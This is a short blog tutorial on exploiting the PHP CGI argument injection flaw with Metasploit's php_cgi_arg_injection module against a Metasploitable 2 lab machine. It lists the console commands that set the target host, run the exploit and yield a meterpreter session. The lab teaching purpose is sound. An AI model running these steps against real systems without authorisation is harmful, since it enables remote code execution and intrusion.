Spirited wolf's

Tutorial's

PHP CGI ARGUMENT INJECTION using Metasploit

Leave a Comment
Hello Everyone,
Today i would like to demonstrate How we can do PHP CGI ARGUMENT INJECTION using Metasploit.

REFERENCES
So, If have you Don't know about metasploit then check my then tutorials:-

     ==>Metasploit Playlists<==

So, If you already know about Metasploit then lets start.

The module that we are going to use is :-exploit/multi/http/php_cgi_arg_injection

About this vulnerablity-by Rapid7
So they say-"When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: "if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the "encoded in a system-defined manner" from the RFC) and then passes them to the CGI binary.""

This means that if we try to pass/add some parameter we can run some arbitrary code using it. 

So lets try to exploit it.

We are going to use Metasploitable 2.

1. Open Metasploit console.
[Image: H8B4rmb.png]

2. Then just select php_cgi_arg_injection module.
Code:
msf> use exploit/multi/http/php_cgi_arg_injection 


[Image: 8a6B1oA.png]

3. Now just set the options and exploit.
Quote:
msf exploit(php_cgi_arg_injection) > set RHOST 172.16.18.134
RHOST => 172.16.18.134


msf exploit(php_cgi_arg_injection) > exploit

And done we got a meterpreter session.

[Image: rczIdmz.png]

Done :D we got meterpreter session
[Image: 3ZoFrbK.png]

If you will like this,


[Image: 1vmW1XH.png]
Next PostNewer Post Previous PostOlder Post Home

0 comments:

Post a Comment

Please tell us if we have done anything wrong :) and please share our website if you like.